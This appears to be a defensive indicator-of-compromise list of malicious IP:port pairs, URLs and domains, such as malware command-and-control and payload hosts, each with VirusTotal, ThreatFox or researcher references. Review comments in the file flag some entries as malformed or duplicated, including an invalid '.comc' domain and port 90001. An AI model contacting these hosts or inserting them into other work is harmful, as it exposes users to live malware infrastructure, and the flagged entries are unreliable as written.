# Reference: https://www.virustotal.com/gui/file/259ad9bd08ed475a5544f37c11e7d4a18c8feffe50e1be9944de1ff20ccaee6c/detection

3.126.37.18:12533

# Reference: https://www.virustotal.com/gui/file/2b07b93de86a3a206484cb65893556da14810f29737ce1301cd4252869629711/detection

79.110.196.41:9005

# Reference: https://blogs.blackberry.com/en/2023/09/silent-skimmer-online-payment-scraping-campaign-shifts-targets-from-apac-to-nala

4.216.137.19:443
4.216.137.19:8080

# Reference: https://twitter.com/_JohnHammond/status/1708910264261980634

103.163.187.12:8080
/cz3eKnhcaD0Fik7Eexo66A

# Reference: https://twitter.com/drb_ra/status/1709382606972653886

135.181.37.202:443

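# Reference: https://www.virustotal.com/gui/file/8e7a257076b6e97b4d50e99426598607241dfddd376b7a3b8b128b8f60415c0c/detection
# NOTE(review): the entry below ends in ".comc", which is not a valid TLD, so it is unlikely to match real traffic.
# Presumably a typo for ".amazonaws.com" - confirm against the reference before correcting.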

testrain.s3.us-west-1.amazonaws.comc

# Reference: https://threatfox.abuse.ch/browse/malware/win.poshc2/ (# 2023-10-11)

103.39.230.213:3790
157.245.128.27:443
18.134.14.164:443
185.255.79.26:3790
46.243.186.112:3790
51.250.38.28:443
68.183.227.107:444
70.77.124.96:8443
94.198.53.143:443
94.23.228.43:443

# Reference: https://twitter.com/ScumBots/status/1712717382886560036
# Reference: https://www.virustotal.com/gui/file/4f97115e2fffc6c52bcf715b0c54152bcc95811dfdabfca02d0f136ecfbac9a3/detection

45.128.232.86:9001

# Reference: https://twitter.com/ScumBots/status/1711390002867732883
# Reference: https://www.virustotal.com/gui/file/b7c49151c1cf72e7a366cb0d5daf70492d05ebaed4f9264102d5b9f02f890109/detection

lovelace.loophole.site

# Reference: https://twitter.com/ScumBots/status/1712838182587228272
# Reference: https://www.virustotal.com/gui/file/8d5378448b2ac7511a59ad7fe8b3026f3a04f8f956a382ed852ae7f2fca57fc9/detection

45.128.232.86:1337

# Reference: https://threatfox.abuse.ch/ioc/1189595/

88.210.9.139:443

# Reference: https://threatfox.abuse.ch/ioc/1189901/

185.234.216.64:443

# Reference: https://twitter.com/banthisguy9349/status/1757768177696571871

185.234.216.64:8000

# Reference: https://threatfox.abuse.ch/ioc/1191031/

159.100.29.105:8888

# Reference: https://www.virustotal.com/gui/ip-address/181.56.166.194/detection

http://181.56.166.194

# Reference: https://threatfox.abuse.ch/ioc/1191345/

213.219.37.158:443

# Reference: https://www.virustotal.com/gui/ip-address/130.61.40.154/detection

http://130.61.40.154

# Reference: https://twitter.com/ScumBots/status/1717576908685053966
# Reference: https://www.virustotal.com/gui/file/b6e4d8b5d4b3fc1c45673cd91d0fd54da4706ecc63f9821a161fdea05ce8fee0/detection

34.87.67.111:9001

# Reference: https://twitter.com/ScumBots/status/1717576983251390579
# Reference: https://www.virustotal.com/gui/file/c9d39adf22200b9ac92bc07e6dd12c1c30562ca6819b5a1182142c5c8bb1dbed/detection

139.144.176.53:9001

# Reference: https://threatfox.abuse.ch/ioc/1196098/

3.253.77.60:443

# Reference: https://www.sentinelone.com/blog/threat-actors-actively-exploiting-progress-ws_ftp-via-multiple-attack-chains/
# Reference: https://otx.alienvault.com/pulse/6525605d7e0da326e806369b

2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com
bgvozb1wnz86q952zxjlwusv2m8gw5.oastify.com
qzt3iqkb6erl9oohic20f9bal1rsfh.oastify.com

# Reference: https://threatfox.abuse.ch/ioc/1197635/

13.48.77.144:443

# Reference: https://twitter.com/malwrhunterteam/status/1719817510063649096
# Reference: https://twitter.com/malwrhunterteam/status/1719814620146196785
# Reference: https://www.virustotal.com/gui/file/4ea37ddd66bb4ece8c16eb02a016f45650a1e5677454533d3f1d3fd2c61f040b/detection
# Reference: https://www.virustotal.com/gui/file/be4d6ecea23712790a13f4d538a5bc9feaaa61054f7fd9d0cb45d304a1129250/detection

communications-stream.azurewebsites.net
globalupdates.azurewebsites.net

# Reference: https://twitter.com/malwrhunterteam/status/1719778744531915103
# Reference: https://www.virustotal.com/gui/file/7f5fd51b97907e7dbad4a79aea928d562d93dc56dd7320a6823dcd55fe1b727c/detection

shdf.global.ssl.fastly.net

# Reference: https://twitter.com/Gi7w0rm/status/1721564409800142986
# Reference: https://www.virustotal.com/gui/file/cb6768fc529a0124cfb417faa72bbbc47942d8594d7f36bf40595f25c1bd1e73/detection

http://193.149.129.136
193.149.129.136:55556

# Reference: https://x.com/suyog41/status/1915373432574775499
# Reference: https://x.com/malwrhunterteam/status/1915382237236785464
# Reference: https://www.virustotal.com/gui/file/3c9d179d6c8061fb921285c59259e53129f7dcd6c02a685276908d28504c8a8c/detection
# Reference: https://www.virustotal.com/gui/file/8beba833da758b47c77e62269bba3624a16b33f7f8b791d6a5343c819b5c7075/detection

http://65.38.120.193
/PaloNetwork/Files/JL01.html
/PaloNetwork/Files/FG03.html
/PaloNetwork/Files/iloveyou.png

# Reference: https://twitter.com/drb_ra/status/1721707992142282792
# Reference: https://www.virustotal.com/gui/file/f232292c5a5be9cca042b6a204b3eac6e2b47de5683376eb9dca3a4283c38417/detection
# Reference: https://www.virustotal.com/gui/file/f1919abe7364f64c75a26cff78c3fcc42e5835685301da26b6f73a6029912072/detection
# Reference: https://www.virustotal.com/gui/file/ebd54bda4cc2adc94cc987a6a6e0e381aed0e3b35242bb283c9431117e9f1d9f/detection
# Reference: https://www.virustotal.com/gui/file/ac65fc0b341293796fba4e6b060ea3b2784456a0c3414ca5818726b42246d1a7/detection

aqlifecare.com
health.aqlifecare.com

# Reference: https://twitter.com/drb_ra/status/1721895020880712100
# Reference: https://www.virustotal.com/gui/file/208c395d7cba4adf69df4f95fd9c874ff52ffab14df525e50d1255d3d950f2ab/detection
# Reference: https://www.virustotal.com/gui/file/52b58ee6ebe69ee13fe970a68eda09118aa83d5a669b79090f6a880fd9d344d8/detection

viewservice.org/usersync/tradedesk/

# Reference: https://threatfox.abuse.ch/ioc/1199587/

132.145.106.12:443

# Reference: https://twitter.com/1ZRR4H/status/1722515857832559066
# Reference: https://www.virustotal.com/gui/file/4ff71b3f881dbf6692adf9fe686da6acfe8190a53d2b0afca3815b2d4903f019/detection

http://80.92.206.203
80.92.206.203:443

# Reference: https://www.virustotal.com/gui/file/85239a43c106a44aac81c772f87982848cf18bcce87b5c0b5c4f1b1ea17c8b66/detection

cloudfare.webredirect.org

# Reference: https://twitter.com/ScumBots/status/1722878084913693164
# Reference: https://www.virustotal.com/gui/file/a4fafa40bfe7001d890c256f6c4456a63ba16165f37ce7763a18ae4d48ffcba2/detection

18.177.76.42:19536

# Reference: https://twitter.com/ScumBots/status/1722988815965409392
# Reference: https://www.virustotal.com/gui/file/3e2c2052e4854730e5de9f445426030f03c80ea3d031eb89b23b6cdd65a55b9d/detection

18.177.60.68:18056

# Reference: https://threatfox.abuse.ch/ioc/1201542/

79.143.181.62:443

# Reference: https://twitter.com/ScumBots/status/1723308424081907796
# Reference: https://www.virustotal.com/gui/file/573e2765776dbe271ef7feefa7502d7a758178f067c595ea9908e2df2ae9abb0/detection

18.177.0.235:18072

# Reference: https://twitter.com/doc_guard/status/1725564939878756608
# Reference: https://www.virustotal.com/gui/file/33d3af4cae982d5f0456f3b13d5dcf90506c0262e2900d4ef32a4e01a59628bc/detection
# Reference: https://www.virustotal.com/gui/file/92343dd76241c60af94b8ccd1d841539dce75f61baf0c8f7eb655244e7c74f5d/detection
# Reference: https://www.virustotal.com/gui/file/96c62314d9fe9d18efb86551ac411d17de0e9ecda19654355da9b5e80ef91cf0/detection

45.94.171.145:65001
rootsomer.com.tr

# Reference: https://twitter.com/malwrhunterteam/status/1726684924189778027
# Reference: https://www.virustotal.com/gui/file/51d58c202db91bf0cdb3fd5008dcec32e098d6ce11d8bfe60eeb48f52b9881d9/detection

89.23.96.127:7777
drive-cloud.site
google.drive-cloud.site

# Reference: https://www.virustotal.com/gui/file/17e224b87896058d524b045a1f381cdef5706e39269a241ff66ce182a236a8e1/detection

growens.it

# Reference: https://www.virustotal.com/gui/file/ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44/detection

adobe-us-updatefiles.digital

# Reference: https://twitter.com/ScumBots/status/1729243782003007627
# Reference: https://www.virustotal.com/gui/file/f8d9c76db48bcacc9d1d6eebd448fe64840a22ca02b4adf038369de0ab1c0854/detection

69.69.69.69:9032

# Reference: https://twitter.com/ScumBots/status/1730067964680958059
# Reference: https://www.virustotal.com/gui/file/701bf64997d99ecd5746a74490b91907ae7a2932a1328e8f8153060b5517f201/detection

18.177.76.42:16408

# Reference: https://twitter.com/ScumBots/status/1730062930895372548
# Reference: https://www.virustotal.com/gui/file/ef7fdc6dce3cd02b4723a02076161a2db53c8d3872d87c01b90c3a4493822044/detection

18.176.183.3:16499

# Reference: https://twitter.com/ScumBots/status/1730005048715846083
# Reference: https://www.virustotal.com/gui/file/672f42064edaf777423c28564d4699ba6d3a8ce7be6d2a077bfb2c56033d2738/detection

18.177.53.48:10233

# Reference: https://twitter.com/ScumBots/status/1730002531143602423
# Reference: https://www.virustotal.com/gui/file/2a7876be11ba9711d3c40dc32d0a682ab5d9f5f97a1e48800ff0e071c4494418/detection

18.177.0.235:18650

# Reference: https://twitter.com/ScumBots/status/1729855312239186318
# Reference: https://www.virustotal.com/gui/file/d7f55aee386b92996121a3db058a99ebcb36c8beb102ec97a84a0861f0ed668b/detection

185.198.56.73:10443

# Reference: https://twitter.com/ScumBots/status/1729786117203931283
# Reference: https://www.virustotal.com/gui/file/9085492cb286de93e5827917b70ff0766d2428b6f7fc3048f832a21fb48d0c0b/detection

18.177.0.235:18224

# Reference: https://twitter.com/ScumBots/status/1729783590202867719
# Reference: https://www.virustotal.com/gui/file/0d386a97d8bb9b552ec6f5b846e5d5782e8e1961d6b5f20ecfbe0c6f1ce4f692/detection

18.177.0.235:19610

# Reference: https://twitter.com/ScumBots/status/1728486288553087217
# Reference: https://www.virustotal.com/gui/file/0a5b954528f496eba1fbfb342beb2f6fba414eb65fb4080a25e6076dd8f81f7a/detection

147.185.221.17:28648

# Reference: https://twitter.com/ScumBots/status/1727526214837948878
# Reference: https://www.virustotal.com/gui/file/1f66f988f842c0b1d50d7988354ddaaaf7df2d171b8407f12fae111db7a19a62/detection

18.177.60.68:16672

# Reference: https://twitter.com/ScumBots/status/1727523700713336901
# Reference: https://www.virustotal.com/gui/file/ca78da048be50d57af074b9348150606c11564a087f8b15eb273a4c853a6557c/detection

18.177.76.42:17168

# Reference: https://twitter.com/ScumBots/status/1727518668345532521
# Reference: https://www.virustotal.com/gui/file/ddde2b7bf9b8272efc367ff0a32f9195b38f81c103c64d1773994236f41aa861/detection

18.176.183.3:13608

# Reference: https://twitter.com/ScumBots/status/1725412296111911402
# Reference: https://www.virustotal.com/gui/file/85cb3767b22a0fe7280519d30663972557ccd681738baa855f70daf767dc6d42/detection

18.177.76.42:18064

# Reference: https://twitter.com/ScumBots/status/1724780625121714349
# Reference: https://www.virustotal.com/gui/file/404c3ce096f6991834caeae8a5969f52b73b796c5ac7896875f069b708f8032b/detection

18.176.183.3:16992

# Reference: https://twitter.com/ScumBots/status/1724418231362822592
# Reference: https://www.virustotal.com/gui/file/0259975a0674bd03f1293281ee6d4b01be43929f3d505b3f8d243332ab3b1cca/detection

18.177.76.42:12625

# Reference: https://twitter.com/ScumBots/status/1724408165658243082
# Reference: https://www.virustotal.com/gui/file/7ac271b284c02f95bf6333c1de26f494eb6b780ce09d2c704afa3cdb112f7528/detection

18.176.183.3:16208

# Reference: https://twitter.com/ScumBots/status/1724078495829991483
# Reference: https://www.virustotal.com/gui/file/f8bd60ec9c3262f9df306c0aacc83c5e3e78665a49e1b2e8d1bcbf9169a1f700/detection

18.177.0.235:15888

# Reference: https://twitter.com/ScumBots/status/1724008034785952116
# Reference: https://www.virustotal.com/gui/file/f5d21d57cbc53dccee84e7bb701c3070661d0cbd39ff352b660df2846f126c72/detection

18.177.60.68:12816

# Reference: https://twitter.com/ScumBots/status/1724005519151485194
# Reference: https://www.virustotal.com/gui/file/51dbd2d4dd796949b14afc81aeb78fd1c712b068e101b9ad1572d6e770491806/detection

18.177.0.235:19410

# Reference: https://twitter.com/ScumBots/status/1723947633100628349
# Reference: https://www.virustotal.com/gui/file/22c1329be33647af3519c6ecac6f934b1bedfad2266f23ba34e5c81817ea4d59/detection

18.177.60.68:12641

# Reference: https://twitter.com/ScumBots/status/1723945125082964066
# Reference: https://www.virustotal.com/gui/file/24f8581f8da73997f9fdf1d19a4da0140fd85fb684f6d657e2d0547320489722/detection

18.177.76.42:18744

# Reference: https://twitter.com/ScumBots/status/1723942676880318551
# Reference: https://www.virustotal.com/gui/file/cdaa6ce98344ce69b6c93bee366ec1a746d672aacf9d14df4af326a6d536d0c3/detection

18.176.183.3:12601

# Reference: https://twitter.com/ScumBots/status/1723942599138939269
# Reference: https://www.virustotal.com/gui/file/040fe52ae08209acdec3c0856d79ad53bb89d45f42837cf64bcc1bd9af9e5fc1/detection

18.177.76.42:10528

# Reference: https://twitter.com/ScumBots/status/1723937565940523176
# Reference: https://www.virustotal.com/gui/file/8b6b6dd7e953ef8d730f7a33cdf56ba0dd2b02097c89310287d25333a7f0b2f7/detection

18.176.183.3:13833

# Reference: https://twitter.com/ScumBots/status/1723935058027843806
# Reference: https://www.virustotal.com/gui/file/f75e602c31a8fc107f944cac6d30d2711c1d4f5ffb8645a9e387a3ff6340fcd4/detection

18.177.53.48:13833

# Reference: https://twitter.com/ScumBots/status/1723310946230128775
# Reference: https://www.virustotal.com/gui/file/80834896d6c0dd7a61c3d5f89ddea06e793184077b6ee4a70168d51fca54fb1f/detection

18.177.0.235:19193

# Reference: https://twitter.com/ScumBots/status/1723308424081907796
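# Reference: https://www.virustotal.com/gui/file/573e2765776dbe271ef7feefa7502d7a758178f067c595ea9908e2df2ae9abb0/detection
# NOTE(review): duplicate of the 18.177.0.235:18072 entry listed earlier in this file with the same two references.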

18.177.0.235:18072

# Reference: https://twitter.com/ScumBots/status/1723298436395540941
# Reference: https://www.virustotal.com/gui/file/11d03bb5069bb781567169aa37b8da61e731a9753447344f4ce5cb731017b5b3/detection

18.177.76.42:14706

# Reference: https://twitter.com/ScumBots/status/1723298359253864618
# Reference: https://www.virustotal.com/gui/file/17b1db76f845ac1236a13a0e81b07c6f81b8bcf54d79056008768b521e0d9eca/detection

18.177.76.42:19464

# Reference: https://twitter.com/ScumBots/status/1723293319004926397
# Reference: https://www.virustotal.com/gui/file/a332d9a03fc5f058bbe43920c63a82343f4968584fd3de95247b422658bd2518/detection

18.177.60.68:11625

# Reference: https://twitter.com/ScumBots/status/1723190139885642115
# Reference: https://www.virustotal.com/gui/file/37f9b9194773dcfd0661a084d43d806aa7889724bb8828de7ebd100397877911/detection

18.177.53.48:17984

# Reference: https://twitter.com/ScumBots/status/1723187627598193086
# Reference: https://www.virustotal.com/gui/file/054d994f7c6575ceb31aacc8380898277205861e99b49462752b1750c3cd9a26/detection

18.176.183.3:12209

# Reference: https://twitter.com/ScumBots/status/1723185112961954128
# Reference: https://www.virustotal.com/gui/file/7993994480e859b0c8a6260089c144fac5daaff6249a68094958f981328fdb31/detection

18.177.0.235:14922

# Reference: https://twitter.com/ScumBots/status/1722996370481512623
# Reference: https://www.virustotal.com/gui/file/399f0d3ef13f91a2ee84d27d8f2ea6662a77f62447f607122dac5efed13797c3/detection

18.177.53.48:11440

# Reference: https://twitter.com/ScumBots/status/1722994015358824650
# Reference: https://www.virustotal.com/gui/file/28c9d3eb510a2d423951ebc0f3aafc804fed15f8680da0513a06f677742aec75/detection

18.176.183.3:10122

# Reference: https://twitter.com/ScumBots/status/1722993929631441381
# Reference: https://www.virustotal.com/gui/file/79792001fd78cfb7d07746926ec9eefbd6629ab669c685e4d55d2380034f59a0/detection

18.177.60.68:11867

# Reference: https://twitter.com/ScumBots/status/1722993849792864518
# Reference: https://www.virustotal.com/gui/file/ef21228079382941b59c91068b715a80a6f49d4d822c3f332658cafd052d68f3/detection

18.177.60.68:11385

# Reference: https://twitter.com/ScumBots/status/1722991407143469058
# Reference: https://www.virustotal.com/gui/file/6bcf5cbe50239b2787bf97843ecdc7a6fc816d71e70630b0bd6f0a0f21db6e65/detection
# Reference: https://www.virustotal.com/gui/file/332ccdc1968fc98802a85ba05013a2c699a7382b72b9d9f08334b910203e3af2/detection

18.177.0.235:13721

# Reference: https://twitter.com/ScumBots/status/1722986456845590690
# Reference: https://www.virustotal.com/gui/file/9c59ec234bea2a43db1ef08f405b519f31d88dd90bb3bcad04150cfb6ac05eac/detection
# Reference: https://www.virustotal.com/gui/file/5c726429d44b966bea1464470dd66b3a24d3e824a5e7652edbce20bf69673d4e/detection

18.177.76.42:12819

# Reference: https://twitter.com/ScumBots/status/1722986378139431243
# Reference: https://www.virustotal.com/gui/file/54033f0f9f507ae3d5773696000bdd3e63f5da1cec2794504700339446134169/detection

18.177.53.48:18056

# Reference: https://twitter.com/ScumBots/status/1722968685369856086
# Reference: https://www.virustotal.com/gui/file/1393b94f6048c81c78642a75dee59081d6800673bb97895f06419c2bf5f41d89/detection

18.177.76.42:12433

# Reference: https://twitter.com/ScumBots/status/1722961348877856916
# Reference: https://www.virustotal.com/gui/file/051fdadbc6f1cf9488a8d9abf15971216541c70110a75198bab0622dfa0af293/detection

18.177.76.42:16321

# Reference: https://twitter.com/ScumBots/status/1722958621032472836
# Reference: https://www.virustotal.com/gui/file/41f968891129a281f8570aca44a8001a29c560937aec8b80cbb60f576a4600a7/detection

18.177.53.48:15584

# Reference: https://twitter.com/ScumBots/status/1722895698817855941
# Reference: https://www.virustotal.com/gui/file/bb732f7511c559012473fbbdb286e5cc84b9a73b10a0eefd6611d51bd712b331/detection

18.177.60.68:12872

# Reference: https://twitter.com/ScumBots/status/1722878084913693164
# Reference: https://www.virustotal.com/gui/file/a4fafa40bfe7001d890c256f6c4456a63ba16165f37ce7763a18ae4d48ffcba2/detection

18.177.76.42:19536

# Reference: https://www.virustotal.com/gui/file/f8127f7205bbbdfa3f40a4c009703641c0ed09cf89aa6ce5510524feccaa8726/detection
# Reference: https://www.virustotal.com/gui/file/89e6f33824e88d57cda8be418ff52e814fb29cd39ac5f825eae2a024cb6ef700/detection

185.81.157.149:2023
france8292.nerdpol.ovh

# Reference: https://twitter.com/karol_paciorek/status/1730544154113913108

65.0.50.125:22355

# Reference: https://www.virustotal.com/gui/ip-address/3.93.178.75/detection

http://3.93.178.75

# Reference: https://twitter.com/ScumBots/status/1731740236240015801
# Reference: https://www.virustotal.com/gui/file/93bf4be640c337f290ba1fdf264d56bc3213738219d5ab63d0f0a8cac9630d04/detection

138.2.157.219:443

# Reference: https://twitter.com/alex_lanstein/status/1732868035843645723
# Reference: https://www.virustotal.com/gui/file/bb09b5b26c1c74cf828eec82048ae6271724f61007dd853a3ba705b6dde04337/detection

122.228.116.67:8080

# Reference: https://twitter.com/drb_ra/status/1732758759754141753

d11zd6hrtvyf1p.cloudfront.net

# Reference: https://www.virustotal.com/gui/file/4c34df2f7423f7b7bf7440e051035c1e5d9db272c741d629141324491b0d4d5d/detection

3.126.37.18:14362

# Reference: https://twitter.com/ScumBots/status/1735535234664308787
# Reference: https://www.virustotal.com/gui/file/44c7c3e0dfb28cab1ef535f8a53dba0e5488e7b5239a144006fbd25a5e6c01ca/detection

18.136.148.247:15343
18.139.9.214:15343

# Reference: https://twitter.com/ScumBots/status/1735532726797672915
# Reference: https://www.virustotal.com/gui/file/3b657c49664960ef41e9db981923cad7e73bafa1d87f93d1789409d7f58539b7/detection

18.136.148.247:16423

# Reference: https://www.virustotal.com/gui/file/86086bc19dd4e1316fe6dee93454f4808fcb7e2ba3948097dc48f01cf2b10c5e/detection

115.50.30.228:33238
115.63.183.62:58957
117.252.168.65:36030
222.137.83.24:39926

# Reference: https://www.virustotal.com/gui/file/762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378/detection

196.196.156.2:49210
196.196.156.2:57881

# Reference: https://twitter.com/Cuser07/status/1740659266900611531
# Reference: https://www.virustotal.com/gui/file/8edfc87e63a2800702665a5c8d5d7b7d5cd549febcdacf8a22bd391c851a45ec/detection

d1ebpf5ahsunvt.cloudfront.net

# Reference: https://threatfox.abuse.ch/browse/malware/win.poshc2/ (# 2024-01-03)

http://13.48.77.144
http://173.249.26.59
139.84.172.20:443
161.35.21.152:443
173.249.26.59:443
35.80.38.180:443
35.80.38.180:8443
65.20.68.219:443
d328.net

# Reference: https://tria.ge/231230-q2rawaebc3/behavioral1

steam-install.run

# Reference: https://twitter.com/ScumBots/status/1740670327271653589
# Reference: https://www.virustotal.com/gui/file/317152256190ca37a0fa1ce2c1807024c98a3267ef1eb6842a7a2a09833e2062/detection

35.239.127.10:443

# Reference: https://twitter.com/ScumBots/status/1743064852963144055
# Reference: https://www.virustotal.com/gui/file/b7f4dcdb365b9a74324ccb0e750e8181500268e7f413973e1b873ceda159a509/detection

193.161.193.99:64773

# Reference: https://www.virustotal.com/gui/file/fcd6f5506ed12295692c7c1e5b8c4104aa379ac37d1034374ba9c3e3328e3914/detection

85.209.11.36:26670
2610asdkj.site
bchbonus.com

# Reference: https://www.fortinet.com/blog/threat-research/lumma-variant-on-youtube

176.113.115.224:29983
176.113.115.226:29983
176.113.115.227:29983
176.113.115.229:29983
176.113.115.232:29983

# Reference: https://twitter.com/ScumBots/status/1744771096124039618
# Reference: https://www.virustotal.com/gui/file/e7b3bb4a61a12b8c4ce7d0f4ab6f7fd899883a871d4d426de076f87b3392bcc6/detection

79.113.4.99:8081

# Reference: https://twitter.com/ScumBots/status/1744839048693162495
# Reference: https://www.virustotal.com/gui/file/a242aeb820185122af76bac0689167116dc5077172ba71cb92459c70d4233fcd/detection

193.161.193.99:61800

# Reference: https://twitter.com/sicehice/status/1745307281267294342
# Reference: https://www.virustotal.com/gui/file/bf50b3d9d11c1fe5d56c3a9152f37f141ed00b43813bdf267b2cbf605257f8f7/detection

52.57.79.63:4444
/powershell-backdoor-generator-main/

# Reference: https://twitter.com/drb_ra/status/1746166747332301039

3.120.209.174:443

# Reference: https://twitter.com/ScumBots/status/1746588069258575897
# Reference: https://www.virustotal.com/gui/file/fa18091c3f994270dfd753f791351b1efe8058520fec8059aaf1981ad952c26d/detection
# NOTE(review): 90001 is above the maximum TCP/UDP port number (65535), so this
# IP:port pair cannot match real traffic as written. Re-check the port against
# the references above before relying on this entry.

3.6.115.64:90001

# Reference: https://twitter.com/0xBurgers/status/1661279651157737472
# Reference: https://www.esentire.com/blog/workersdevbackdoor-delivered-via-malvertising

advanced-ip-scanner.net
advanced-ip-scanners.net
wtf-system-4758995.workers.dev
wtf-system-4759011.workers.dev
cdn-software.workers.dev
extended-system.workers.dev
cdn-cloude.extended-system.workers.dev
cdn-us-tech.wtf-system-4758995.workers.dev
cdn-us-tech.wtf-system-4759011.workers.dev
us.cdn-software.workers.dev

# Reference: https://twitter.com/drb_ra/status/1746896061325582823

wrk5.eastus.cloudapp.azure.com

# Reference: https://www.virustotal.com/gui/file/d35648979ad90bdd1f27896dd66d77e9972a6b5b86d3ae88c556dd7bbafbd7fa/detection
# NOTE(review): 91.92.254.174:5800 breaks the 5800x pattern of the neighbouring
# ports (58001-58003); it may be a truncated value - confirm against the sample's
# observed connections.

163.5.64.98:58003
91.92.254.174:5800
91.92.254.174:58001
91.92.254.174:58002
91.92.254.174:58003
blue.o7lab.me

# Reference: https://twitter.com/drb_ra/status/1750335823524893138

165.227.246.129:443

# Reference: https://twitter.com/ScumBots/status/1753921394436415944
# Reference: https://www.virustotal.com/gui/file/8afcb016e39b5494802e39839ffbc469896525980214fc5f22ec49d19defb636/detection

45.128.232.34:9001

# Reference: https://twitter.com/ScumBots/status/1754356754173849915
# Reference: https://www.virustotal.com/gui/file/ce6cb6551226f51abde1475e1a0485cad9494a19d35424dd199c220e3ddd129a/detection

34.139.44.168:8000

# Reference: https://twitter.com/Joseliyo_Jstnk/status/1754830872031744020
# Reference: https://www.virustotal.com/gui/file/3761fb4c5b30d06501fe6688019ace6c899bdfc278049ddd91b96e0efe0d8830/detection
# Reference: https://www.virustotal.com/gui/file/b9c763ed1cd4cabc6faa0fece7738a941de1d65163d05480c9790217d931c7c8/detection

46.101.126.207:443
46.101.126.207:8080

# Reference: https://twitter.com/ScumBots/status/1754975840197120088
# Reference: https://www.virustotal.com/gui/file/aebb2b7cd7fc664e0bf3ff878d7058986b047159b4f9f9004ba45f1837c5f2a7/detection

194.21.3.8:1337

# Reference: https://www.virustotal.com/gui/file/cfa40f0fec496888a22ddf61803cc9ddfdabf06d85d4fedf7efbed59d29b9eea/detection

194.5.98.235:5900

# Reference: https://twitter.com/karol_paciorek/status/1757353098035511512
# Reference: https://www.virustotal.com/gui/file/609a919f7f20b2099e0e283f46b768f749d8c9a7998a539bc4d29b56fb74373f/detection

http://144.76.219.54
144.76.219.54:8081

# Reference: https://twitter.com/Purp1eW0lf/status/1758825322399625545

185.147.213.194:443

# Reference: https://twitter.com/ScumBots/status/1761372989214298223
# Reference: https://www.virustotal.com/gui/file/5e04174a8cba880cce9d6d7d4073e7402f6855eb4adb0b47f5f73da86e212d15/detection

130.61.108.56:25575

# Reference: https://twitter.com/ScumBots/status/1767541137768697951
# Reference: https://www.virustotal.com/gui/file/619148d288215955662b7019384c6fefb5bd4d96fecb80368a7b6de23736dc08/detection

13.37.87.194:7007

# Reference: https://twitter.com/ScumBots/status/1767563807293931542
# Reference: https://www.virustotal.com/gui/file/017292ffa323ca3deb8a1c0a6ba2f32ed2fd2ec75eed5a22f8fbc096880fc944/detection

13.37.87.194:443

# Reference: https://www.virustotal.com/gui/file/7072297b018300c0f1d432ac4a7e98ebca34c9377215a55b1fd186551fd6b2e9/detection
# Reference: https://www.virustotal.com/gui/file/e1f0d4706f5c9aae0902b278c423f3cb135180ecd69f43d47111a06f1e647e91/detection

18.177.53.48:15486

# Reference: https://www.virustotal.com/gui/file/74aee342201d218a640fcc57974cb713e23ca05e6e74111c35bb797de7390028/detection

18.176.183.3:14849

# Reference: https://www.virustotal.com/gui/file/97103a38ca96751430190a2c14bda371fa1753b6ac8c904c3783b151fbafadab/detection

18.176.183.3:19517

# Reference: https://www.virustotal.com/gui/file/15cb5d2170a131a4c402dbd2a8a5d5b5996709b2b5ebdf03e4b6350096fac7dc/detection

18.176.183.3:13584

# Reference: https://www.virustotal.com/gui/file/f00fdb2a462b1ee5bce21181ee2e8f7beb6a17b7ebdcfeae1d7669ec886c1627/detection

18.176.183.3:15502

# Reference: https://www.virustotal.com/gui/file/4f6e8de8f57b96d6342121d01a67a803ba88015de8283122245c5e3a6f4efe0d/detection

18.177.60.68:15302

# Reference: https://www.virustotal.com/gui/file/380a561a3e8d488489f101560830ecdf309851bbd9ad45f92a09121cdb2fd568/detection

165.227.224.60:8080

# Reference: https://www.virustotal.com/gui/file/55cd6b23ce8586bde06e974745a025c9f6595415c71a3595bf217a7ccc7554a3/detection

85.245.250.108:8080

# Reference: https://www.virustotal.com/gui/file/160540c6f26752264bd90cae32ead977868637d9afac14d9726972fc49b86b8b/detection

3.6.115.64:19833
3.6.30.85:19833

# Reference: https://www.virustotal.com/gui/file/d3f02563e38094e0216ddb73b215b5d9ce99011c43a3211f450c153df93c99ea/detection

185.117.118.21:49769

# Reference: https://www.virustotal.com/gui/file/1b0b6d51d6ea22574c9252ec096477a78e1f2ef10e92cae027292f4418c885b9/detection

18.177.60.68:17489

# Reference: https://www.virustotal.com/gui/file/60694a0680edba3640008ae16bf7f521fe91b93c1a2c440657b6d86c0ec7c00f/detection

18.176.183.3:13450

# Reference: https://www.virustotal.com/gui/file/9119d51da2a9ff70b77834056723b1791f0d2f09a5eee499a683681270eff8e8/detection

18.176.183.3:13433

# Reference: https://www.virustotal.com/gui/file/d1df44a5213dda2704c92779cbea83964d5aa8686e03884cd722201ea3ce33cb/detection

18.176.183.3:13745

# Reference: https://www.virustotal.com/gui/file/4a825aec2c8f92ac8802adcba44991ba7ad1d4912c9a453f32d6d09cc08e4bb4/detection
# Reference: https://www.virustotal.com/gui/file/1d0e66c92b3cbde06ee14aa910ed51647a60d33459f7f81873fbfd09df29529a/detection
# Reference: https://www.virustotal.com/gui/file/3b838c2761af6a8b49c7460d3ed835a23441ed4d6e3a037c9c5d2ffa31693c54/detection

18.156.13.209:11592
18.157.68.73:11592
18.197.239.5:11592
3.127.138.57:11592

# Reference: https://www.virustotal.com/gui/file/300c58f06ba356a509afeb048354143fd9172e676eb1307b6a7a7f338f199e01/detection
# NOTE(review): duplicate entry - 165.227.224.60:8080 is already listed earlier
# in this file under VirusTotal sample 380a561a...; consider keeping a single
# entry with both sample references above it.

165.227.224.60:8080

# Reference: https://www.virustotal.com/gui/file/a303a8a831b577dca4a1188fbe257c348fe73102a3aa43d2e60243b61ad63ef8/detection

http://15.161.126.107

# Reference: https://www.virustotal.com/gui/file/2f6fa0b9f9997e0b5ae31f85c56c6ecf583a33990ad8fae3148f706b57d69514/detection
# NOTE(review): this address differs by a single digit from 194.21.3.8:1337,
# listed earlier in this file; presumably both are genuine, but confirm neither
# is a transcription slip.

194.213.3.8:9555

# Reference: https://www.virustotal.com/gui/file/52f4b9da3052bd5bf99bc87bc9d9eb5f94ce65ab89198c5408daa3d17ab7c4af/detection

18.176.183.3:18619

# Reference: https://www.virustotal.com/gui/file/39d5ec5af27ce18da21501d59d72063bbae2f7886a9da17cac4aa9f496f1dde8/detection

18.177.60.68:16180

# Reference: https://www.virustotal.com/gui/file/4c464611b5ab88d75a4a573cf864776deb293aa2a8fc3c1c5fb17adab6cca8e7/detection

18.177.0.235:12545

